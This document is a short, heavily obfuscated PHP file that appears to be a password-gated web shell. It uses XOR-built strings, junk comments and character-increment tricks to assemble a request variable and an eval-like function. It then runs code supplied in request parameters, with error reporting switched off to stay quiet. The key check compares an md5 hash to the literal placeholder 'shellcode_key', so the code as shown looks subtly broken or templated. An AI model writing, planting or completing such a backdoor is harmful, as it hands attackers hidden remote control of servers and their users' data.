<?php
error_reporting(0);
$o=/*$#)0//*/('#'/**/^"|").#*&^092h%$;'
/*$__+^@!(*/("."/*#KHGHG7^%;/*/^'~').#'
/*@#**/(/*hjk(*&^(*#J*/"/"^/*$_^@!(*/#'
"`")./*$____++^[0]*__*/("|"^'/')/**/#/'
./*$#)0([])/*//**/#*&^%)092hG%$;/**/#/'
(#)0([])/*/*/*EaG*/#/*/##*&^%)092hG%$;'
"{"/*hj*092$____^h);/$_*/ ^'/');@$_o++;
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;
$__=$_;/*$_*/$__++;$__++;$__++;$__++;#'
$__++;/*0([])/*//**/#*&^%)092hG/**/#/*'
$__++;$__++;$__++;$__++;$__++;$__++;#^'
$__++;$__++;$__++;$__++;$__++;$__++;#^'
/*$_*/$__++;$___.=$__;$___.=$__;$__=$_;
$__++;$__++;$__++;$__++;$___.=$__;#^'#'
$__=$_;$__++;$__++;$__++;$__++;$__++;#'
$__++;$__++;$__++;$__++;$__++;$__++;#^'
$__++;$__++;$__++;$__++;$__++;$__++;#^'
$___.=$__;$__=$_;$__++;$__++;$__++;#^_'
$__++;$__++;$__++;$__++;$__++;$__++;#_'
$__++;$__++;$__++;$__++;$__++;#$______'
$__++;$__++;$__++;$__++;$__++;#*&^%)09'
/*&^(/&^__(*/$___.=$__;$______=$$o;#$_'
$_______="$___";#0([])/092000hG/**/#/*'
$o_=/*$o_=$_o<<$o_*/$_o++/*$_*/<<--$_o;
if/*&^(/&^__(*/(/*#^%;/*/#$o_=$_o<<$o_'
/*$_*/md5(/*$_^$___/*/$______[$o_]/**/)
!= /*^$_____|$_____$__*/#*&^%)092hG%$;'
"shellcode_key"
)/*$_|*/die;$_______(/*$______#)0([]/_'
/*$___*/$______[!$_o]($______[$_o]));#'